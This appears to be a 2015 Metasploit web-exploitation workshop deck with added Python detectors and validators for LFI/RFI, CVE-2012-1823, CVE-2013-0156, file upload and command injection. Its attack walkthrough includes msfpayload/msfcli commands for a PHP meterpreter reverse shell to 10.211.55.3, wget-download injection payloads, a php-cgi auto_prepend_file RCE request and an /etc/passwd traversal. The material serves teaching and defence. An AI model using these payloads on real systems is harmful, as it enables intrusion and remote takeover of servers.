Dennis Maldonado
@DennisMald
2015-02-20
• Application Security Specialist, WhiteHat Security
• Full-Time Student, University of Houston – Main Campus
  ▪ Computer Information Systems Major
• Twitter: @DennisMald
• Website / Blog: KernelMeltdown.org
• Kali Linux – our attacker machine
• Metasploit Framework – used for exploiting, generating the payload, and establishing a session with our victim
• Metasploitable 2 – victim web server
Exploiting the backend server through a web application.
• Reasons why hackers want to compromise the server:
  ▪ Run attacks against the internal network
  ▪ Use the server as a bot
  ▪ Install backdoors onto the server
  ▪ Reveal sensitive files/passwords
  ▪ Execute any local file
  ▪ Execute remote files
  ▪ and more…
• Vulnerabilities that are dangerous against a server
  ▪ Directory Traversal
  ▪ Local File Inclusion
  ▪ Remote File Inclusion
  ▪ Remote Code Execution
  ▪ SQL Injection
  ▪ Command Injection
• Demo targets (the ?page= and ?id= parameters are where the inclusion and injection payloads go):
  ▪ http://website.com/?page=index.php
  ▪ http://website.com/
  ▪ http://website.com/user.php?id=1&Submit=Submit#
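The ?page= demo target above is the classic shape of a traversal / LFI / RFI bug: the server includes whatever file name the client supplies. The following Python model is an added example, not code from the workshop or from DVWA; it assumes a hypothetical pages directory (PAGES_DIR) and a hypothetical allowlist, and it never touches the disk. It shows the unchecked resolution side by side with an allowlist-plus-containment check, and a classifier that labels a request URL the way you would while triaging access logs.

```python
import os
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Assumed layout (not from the slides): the front controller includes a file
# named by ?page= from this directory, the way DVWA's file inclusion page does.
PAGES_DIR = "/var/www/html/pages"

# Assumed allowlist of pages the application actually has.
ALLOWED_PAGES = {"index.php", "about.php", "contact.php"}


def page_param(url: str) -> str:
    """Extract the ?page= value, percent-decoded as the server would see it."""
    return parse_qs(urlsplit(url).query).get("page", [""])[0]


def unsafe_resolve(page: str) -> str:
    """Mirrors include($_GET['page']) with no checks: the attacker picks the path."""
    if "://" in page:
        return page  # with allow_url_include=On this is remote file inclusion
    # '..' components walk out of PAGES_DIR: directory traversal / LFI
    return os.path.normpath(os.path.join(PAGES_DIR, page))


def safe_resolve(page: str) -> Optional[str]:
    """Exact allowlist match first; the containment check is defence in depth."""
    if page not in ALLOWED_PAGES:  # no '..', no '/', no scheme can match a fixed name
        return None
    base = os.path.realpath(PAGES_DIR)
    full = os.path.realpath(os.path.join(base, page))
    # Even if the allowlist is later loosened, never resolve outside PAGES_DIR.
    if os.path.commonpath([base, full]) != base:
        return None
    return full


def classify(url: str) -> str:
    """Label what the unchecked include would have done with this request URL."""
    page = page_param(url)
    if not page:
        return "no page parameter"
    if "://" in page:
        return "remote file inclusion"
    base = os.path.normpath(PAGES_DIR)
    if os.path.commonpath([base, unsafe_resolve(page)]) != base:
        return "directory traversal / local file inclusion"
    if safe_resolve(page) is None:
        return "unknown page (blocked by allowlist)"
    return "local include inside pages dir"


if __name__ == "__main__":
    # Constructed URLs: the slide's own example plus the three attack shapes.
    for u in (
        "http://website.com/?page=index.php",
        "http://website.com/?page=../../../../etc/passwd",
        "http://website.com/?page=%2e%2e%2f%2e%2e%2fetc%2fpasswd",
        "http://website.com/?page=http://10.211.55.3/shell.txt",
    ):
        print(f"{u}\n  -> {classify(u)}")
```

Note that the allowlist, not the path check, is doing the real work: a containment check alone still lets an attacker read any file under PAGES_DIR, and it says nothing about remote includes, which should be disabled server-side (allow_url_include=Off) regardless.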
• Metasploit is an open-source framework used for security development and testing
  ▪ Information gathering and fingerprinting
  ▪ Exploitation/penetration testing
  ▪ Payload generation and encoding
  ▪ Fuzzing
  ▪ And much more…
• Command line interfaces
  ▪ msfconsole
  ▪ msfcli
• GUI interfaces
  ▪ Metasploit Community Edition
  ▪ Armitage
• Modules
  ▪ Exploit – exploitation/proof-of-concept code
    ▪ Ruby on Rails exploit
    ▪ PHP-CGI exploit
  ▪ Auxiliary – misc. modules for multiple purposes
    ▪ Scanners
    ▪ DoS tools
    ▪ Fingerprinting
    ▪ Clients
  ▪ Payloads – code to be executed on the exploited system
    ▪ System shells
    ▪ Meterpreter shells
  ▪ Post – modules for post-exploitation tasks
    ▪ Persistence
    ▪ Password stealing
    ▪ Pivoting
• Active exploits
  ▪ Actively exploit a host the attacker connects to.
  ▪ Ex: Ruby on Rails XML exploit
• Passive exploits
  ▪ Wait for incoming hosts (e.g. a browser visiting the attacker's page), then exploit them
  ▪ Ex: Java 0-days
• Either way, the exploit carries a payload
• Inline (non-staged)
  ▪ A single payload: the exploit delivers the complete shellcode in one go
  ▪ Stable
  ▪ Large size
• Staged
  ▪ A small stager runs on the victim, establishes the connection with the attacker, then pulls down the rest of the payload (the stage)
• Meterpreter
  ▪ Advanced, dynamic payload.
  ▪ Extended over the network: extensions are loaded into the live session at runtime
  ▪ Extensible through modules and plugins
• Types of connections
  ▪ Bind
    ▪ A listener is started on the victim machine
    ▪ The attacker connects to the victim
    ▪ windows/x64/shell/bind_tcp
  ▪ Reverse
    ▪ A listener is started on the attacker machine (the handler, LHOST/LPORT)
    ▪ The victim connects back to the attacker
    ▪ windows/x64/shell/reverse_tcp
  ▪ Reverse connections are usually preferred: an outbound connection from the victim passes through firewalls and NAT that would block an inbound connection to a bind port
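To make the bind-versus-reverse distinction concrete, here is an added example (not Metasploit code and not from the workshop) that plays both sides of a shell session on loopback. Everything in it is constructed: both "machines" are 127.0.0.1, the port is chosen by the OS in place of LPORT, and the "shell" answers one fixed command with canned output. What the two functions differ in is exactly what the slide describes: who opens the listening socket and who connects.

```python
import socket
import threading
from typing import Dict

# Constructed demo: both "machines" are loopback on this host, and the "shell"
# only knows one command. The point is who listens and who connects.
HOST = "127.0.0.1"
FAKE_SHELL_OUTPUT = {b"id": b"uid=33(www-data) gid=33(www-data) groups=33(www-data)\n"}


def _listen() -> socket.socket:
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind((HOST, 0))  # port 0: the OS picks a free port (stands in for LPORT)
    server.listen(1)
    return server


def _victim_shell(conn: socket.socket) -> None:
    """Victim side of a shell payload: read one command, answer it, close."""
    with conn:
        cmd = conn.recv(1024).strip()
        conn.sendall(FAKE_SHELL_OUTPUT.get(cmd, b"sh: command not found\n"))


def _attacker_run(conn: socket.socket, cmd: str) -> str:
    """Attacker side: send a command down the session and read the result."""
    conn.sendall(cmd.encode() + b"\n")
    return conn.recv(1024).decode()


def bind_shell_session(cmd: str = "id") -> Dict[str, str]:
    """shell/bind_tcp: the payload opens a port on the victim; the attacker connects in."""
    victim = _listen()
    port = victim.getsockname()[1]

    def victim_side() -> None:
        conn, _ = victim.accept()
        victim.close()
        _victim_shell(conn)

    t = threading.Thread(target=victim_side)
    t.start()
    with socket.create_connection((HOST, port), timeout=5) as attacker:
        output = _attacker_run(attacker, cmd)
    t.join()
    return {"listener": "victim", "connector": "attacker", "output": output}


def reverse_shell_session(cmd: str = "id") -> Dict[str, str]:
    """shell/reverse_tcp: the attacker's handler listens on LHOST:LPORT; the payload dials out."""
    handler = _listen()
    lport = handler.getsockname()[1]

    def victim_side() -> None:
        # The payload has LHOST/LPORT baked in and makes an outbound connection.
        conn = socket.create_connection((HOST, lport), timeout=5)
        _victim_shell(conn)

    t = threading.Thread(target=victim_side)
    t.start()
    conn, _ = handler.accept()
    handler.close()
    with conn:
        output = _attacker_run(conn, cmd)
    t.join()
    return {"listener": "attacker", "connector": "victim", "output": output}


if __name__ == "__main__":
    for name, fn in (("bind", bind_shell_session), ("reverse", reverse_shell_session)):
        s = fn()
        print(f"{name}: {s['listener']} listened, {s['connector']} connected -> {s['output'].strip()}")
```

Once the TCP session exists the command flow is identical in both cases (attacker sends, victim executes and replies); only the direction of the initial connection differs, which is why a firewall that allows outbound traffic stops the bind variant but not the reverse one.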
• CVE-2012-1823 (PHP-CGI argument injection)
  ▪ A query string that contains no "=" is handed to php-cgi as command-line arguments
  ▪ DoS attack: -T 10000 (benchmark mode: run the script 10000 times)
  ▪ Source code disclosure: -s argument (print the script source)
  ▪ Remote code execution: -d argument (override php.ini settings, e.g. allow_url_include and auto_prepend_file)
• CVE-2013-0156 (Ruby on Rails parameter parsing)
  ▪ Easy to find, easy to exploit, critical vulnerability.
  ▪ Requires just one POST request containing specially crafted XML data.
  ▪ The XML parameter parser honours a type attribute; type="yaml" hands the element body to the YAML loader, which instantiates arbitrary Ruby objects, so commands are sent through YAML objects
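Both server-side bugs above leave a distinctive mark on the request, so they are worth detecting at a proxy or in logs while the patches are rolled out. The following request inspector is an added example (not from the workshop or from Metasploit) covering both: for CVE-2012-1823 it applies the CGI rule that made the bug exploitable (a query string with no unencoded "=" is split on "+" and passed to php-cgi as argv) and then looks for the -s, -d and -T flags the slide lists; for CVE-2013-0156 it looks for XML parameters carrying type="yaml" or type="symbol". The request records are constructed, including the 10.211.55.3 address reused from the slides.

```python
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional, Union
from urllib.parse import unquote, urlsplit

# Constructed requests (not real traffic): what a reverse proxy or WAF sees.
SAMPLE_REQUESTS = [
    {"method": "GET", "target": "/index.php?-s", "content_type": None, "body": b""},
    {"method": "POST",
     "target": "/index.php?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input",
     "content_type": "application/x-www-form-urlencoded", "body": b"<?php system('id'); ?>"},
    {"method": "GET", "target": "/index.php?-T+10000", "content_type": None, "body": b""},
    {"method": "POST", "target": "/posts", "content_type": "application/xml",
     "body": b'<?xml version="1.0" encoding="UTF-8"?>'
             b'<post><title type="yaml">--- !ruby/object:Object {}</title></post>'},
    {"method": "GET", "target": "/index.php?page=index.php", "content_type": None, "body": b""},
]


def php_cgi_argv(query: str) -> List[str]:
    """Reproduce the CGI rule behind CVE-2012-1823 (RFC 3875 section 4.4):
    a QUERY_STRING with no unencoded '=' is treated as a search string, split on
    '+' and passed to the CGI program as command-line arguments. php-cgi's check
    that was meant to discard them was broken before PHP 5.3.13 / 5.4.3."""
    if "=" in query:
        return []
    # Decode before matching: a rule on a literal '-' is bypassed by '%2d'.
    return [unquote(part) for part in query.split("+") if part]


def php_cgi_finding(target: str) -> Optional[str]:
    argv = php_cgi_argv(urlsplit(target).query)
    if not argv or not argv[0].startswith("-"):
        return None
    flags = {a[:2] for a in argv if a.startswith("-")}
    if "-s" in flags:
        return "CVE-2012-1823: -s passed to php-cgi (source disclosure)"
    if "-d" in flags:
        return "CVE-2012-1823: -d passed to php-cgi (ini override, remote code execution)"
    if "-T" in flags:
        return "CVE-2012-1823: -T passed to php-cgi (benchmark loop, denial of service)"
    return "CVE-2012-1823: command-line flags passed to php-cgi"


def rails_xml_finding(content_type: Optional[str], body: Union[bytes, str]) -> Optional[str]:
    """Rails parsed XML bodies into params and typecast elements by their type
    attribute; yaml and symbol types reached the YAML loader."""
    if not content_type or "xml" not in content_type.lower():
        return None
    if isinstance(body, str):
        body = body.encode("utf-8")
    try:
        # Untrusted XML: in production use defusedxml to block entity expansion bombs.
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    for el in root.iter():
        typ = (el.get("type") or "").lower()
        if typ in ("yaml", "symbol"):
            return f"CVE-2013-0156: <{el.tag}> typed as {typ} in XML parameters"
    return None


def inspect_request(req: Dict) -> List[str]:
    findings = []
    for f in (php_cgi_finding(req["target"]),
              rails_xml_finding(req.get("content_type"), req.get("body", b""))):
        if f:
            findings.append(f)
    return findings


def inspect_all(requests: List[Dict] = SAMPLE_REQUESTS) -> Dict[str, List[str]]:
    return {r["target"]: inspect_request(r) for r in requests}


if __name__ == "__main__":
    for target, findings in inspect_all().items():
        print(target, "->", findings or ["clean"])
```

The "=" inside the -d payload has to be encoded as %3d, otherwise the query string would contain a literal "=" and the CGI rule would not pass it as argv; that is also why a detector must decide on the raw query string before decoding it.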
• The upload functionality allows any file type to be uploaded
1. Upload server-side code and check if it executes
  ▪ PHP: <?php echo "HelloWorld!"; ?>
  ▪ ASP: <% Response.Write "HelloWorld!" %>
  ▪ JSP: <%= new java.util.Date().toString() %>
2. Use msfpayload to create a shell
3. Use msfcli to listen for a connection from the victim
4. Upload the shell and execute it by requesting its URL
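Step 1 above only works because the upload handler accepts any file and stores it under a name the server will execute. The following validator is an added example of the server-side counterpart (not from the workshop or from DVWA): it applies the upload defences the mitigation slide lists, namely an extension allowlist, a Content-Type check, a check of the file's leading bytes against that type, and a random server-chosen name, so the original file name never reaches disk. The upload directory (UPLOAD_DIR), the allowlist and the sample files are assumptions; nothing is written to disk.

```python
import os
import secrets
from typing import Callable, Optional, Tuple

# Assumed deployment: uploads are stored outside the web root in a directory the
# web server serves as static files only, never as scripts.
UPLOAD_DIR = "/srv/uploads"

# Allowlist: extension -> (Content-Type the client must declare, magic bytes the
# file must start with). Everything not listed is rejected.
ALLOWED = {
    "png":  ("image/png",  (b"\x89PNG\r\n\x1a\n",)),
    "jpg":  ("image/jpeg", (b"\xff\xd8\xff",)),
    "jpeg": ("image/jpeg", (b"\xff\xd8\xff",)),
    "gif":  ("image/gif",  (b"GIF87a", b"GIF89a")),
}


def validate_upload(filename: str, content_type: Optional[str], data: bytes,
                    name_for: Callable[[], str] = secrets.token_hex) -> Tuple[bool, str, Optional[str]]:
    """Return (accepted, reason_or_path, stored_name).

    name_for is injectable so the rename step can be tested deterministically;
    in production leave the default, which yields a random hex token."""
    # 1. Extension: only the final one counts, compared case-insensitively, so
    #    shell.php, shell.PHP, shell.phtml and shell.php.png are all refused
    #    unless the last extension is allowlisted (and then the bytes must match).
    ext = os.path.splitext(os.path.basename(filename))[1].lstrip(".").lower()
    if ext not in ALLOWED:
        return False, f"extension '.{ext}' not allowed", None
    want_ct, magics = ALLOWED[ext]

    # 2. Declared Content-Type must agree with the extension. It is attacker
    #    controlled, so this alone proves nothing, but a mismatch is a cheap reject.
    declared = (content_type or "").split(";")[0].strip().lower()
    if declared != want_ct:
        return False, f"content-type {declared!r} does not match .{ext}", None

    # 3. The bytes must look like that format: a PHP file renamed to .png fails here.
    if not data.startswith(magics):
        return False, "file content does not match declared type", None

    # 4. Rename: the stored name is chosen by the server, with the allowlisted
    #    extension, so no double extension or odd character from the client survives.
    stored = f"{name_for()}.{ext}"
    return True, os.path.join(UPLOAD_DIR, stored), stored


if __name__ == "__main__":
    # Constructed sample uploads: the slide's PHP probe, and a real-looking PNG header.
    samples = [
        ("shell.php", "application/x-php", b"<?php echo \"HelloWorld!\"; ?>"),
        ("shell.php.png", "image/png", b"<?php echo \"HelloWorld!\"; ?>"),
        ("avatar.PNG", "image/png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
    ]
    for name, ct, blob in samples:
        print(name, "->", validate_upload(name, ct, blob))
```

The magic-byte check is not a content scanner: a valid PNG with PHP tucked into a text chunk passes it. What actually stops that file from running is steps 4 and the non-executable upload directory from the mitigation slide, which is why those two belong in every upload handler even when the format checks are in place.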
• Command injection allows an attacker to execute system-level commands.
1. Attempt a safe command first to confirm the injection
  ▪ echo test
  ▪ uname -a
2. Use msfpayload to create a shell
3. Use msfcli to listen for a connection from the victim
4. Inject curl or wget commands to download the shell onto the victim machine
5. chmod if necessary and execute
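The injection in steps 1 and 4 works because the application glues the request parameter into a shell command string. The following is an added example (not code from the workshop or from DVWA) of that pattern next to the fix the mitigation slide asks for: validate the input against what it is supposed to be and call the program with an argument list so no shell ever parses it. The vulnerable function takes the program as a parameter so the demo can run with echo instead of ping; on the real page it would be "ping -c 1".

```python
import ipaddress
import shlex
import subprocess
from typing import List, Sequence

# Constructed stand-in for a ping page. `tool` is parameterised so the demo can
# run with echo; the real handler would use ping -c 1.


def unsafe_ping(target: str, tool: str = "ping -c 1") -> str:
    """Models shell_exec("ping -c 1 " . $_REQUEST['ip']): the input is glued into
    one string and handed to /bin/sh, so ; | && ` $() are all interpreted."""
    return subprocess.run(f"{tool} {target}", shell=True, capture_output=True, text=True).stdout


def is_valid_target(target: str) -> bool:
    """Validate against the grammar the parameter is meant to have: one IP address."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        return False


def safe_argv(target: str, tool: Sequence[str] = ("ping", "-c", "1")) -> List[str]:
    """Build an argv list. Without a shell, metacharacters are just bytes inside
    one argument and can never start a second command."""
    if not is_valid_target(target):
        raise ValueError(f"rejected target: {target!r}")
    return [*tool, target]


def safe_ping(target: str, tool: Sequence[str] = ("ping", "-c", "1")) -> str:
    return subprocess.run(safe_argv(target, tool), capture_output=True, text=True).stdout


def shell_string_last_resort(target: str) -> str:
    """If a shell really cannot be avoided (pipes, redirects), validate first and
    quote anyway; quoting alone is a weaker defence than an argv list."""
    if not is_valid_target(target):
        raise ValueError(f"rejected target: {target!r}")
    return f"ping -c 1 {shlex.quote(target)}"


if __name__ == "__main__":
    # Constructed payloads in the shape the slide describes: a probe, then a download.
    probe = "127.0.0.1; echo INJECTED"
    download = "127.0.0.1 && wget http://10.211.55.3/shell.php"
    print("unsafe:", unsafe_ping(probe, tool="echo").strip().replace("\n", " | "))
    for t in (probe, download, "127.0.0.1"):
        print(f"safe {t!r}:", safe_argv(t, tool=("echo",)) if is_valid_target(t) else "rejected")
```

Validation is the part that maps to "sanitize input" on the mitigation slide, but note which validation: an allowlist of the expected shape (here, a parseable IP address) rather than a blocklist of characters, which is what attackers bypass with encodings and alternate separators.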
# Show the payload's options (O = options)
msfpayload php/meterpreter/reverse_tcp O
# Set LHOST to the attacker's IP as reachable from the victim, pick LPORT, and check the options again
msfpayload php/meterpreter/reverse_tcp LHOST=10.211.55.3 LPORT=1337 O
# Generate the raw payload (R = raw) into a file
msfpayload php/meterpreter/reverse_tcp LHOST=10.211.55.3 LPORT=1337 R > shell.php
# Now edit shell.php: remove the leading "/*" on the first line so the "<?php" tag is live, and add "?>" at the end of the file.
==================================
# Start the handler (E = execute the module) and wait for the victim to connect back on LHOST:LPORT
msfcli multi/handler payload=php/meterpreter/reverse_tcp lhost=10.211.55.3 lport=1337 E
# Note: msfpayload and msfcli were retired from Metasploit later in 2015; msfvenom replaces msfpayload, and msfconsole (with the -x option or a resource script) replaces msfcli.
• Keep software up to date!
  ▪ PHP: 5.4.3 or 5.3.13 and later (fixes CVE-2012-1823)
  ▪ Ruby on Rails: 3.2.11, 3.1.10, 3.0.19, 2.3.15 and later (fixes CVE-2013-0156)
• Use whitelisting for file upload extensions
  ▪ Check both the extension and the content type; neither alone is enough, since both are under the uploader's control
  ▪ Don't let the upload directory be executable
  ▪ Rename files if possible
• Don't pass user input to a system command!
  ▪ Use library calls when possible
  ▪ Sanitize input, preferably by validating it against the format you expect
• Kali Linux (successor to BackTrack Linux): http://www.kali.org/
• The Metasploit Project: http://www.metasploit.com/
• Metasploit Unleashed: http://www.offensive-security.com/metasploit-unleashed/
• PHP-CGI Advisory (CVE-2012-1823): http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
• Ruby on Rails Exploitation (CVE-2013-0156): https://community.rapid7.com/community/metasploit/blog/2013/01/10/exploiting-ruby-on-rails-with-metasploit-cve-2013-0156
• Damn Vulnerable Web Application (DVWA): http://www.dvwa.co.uk/
• Metasploitable 2: http://information.rapid7.com/download-metasploitable.html?LS=1631875&CS=web

Metasploit for Web Workshop
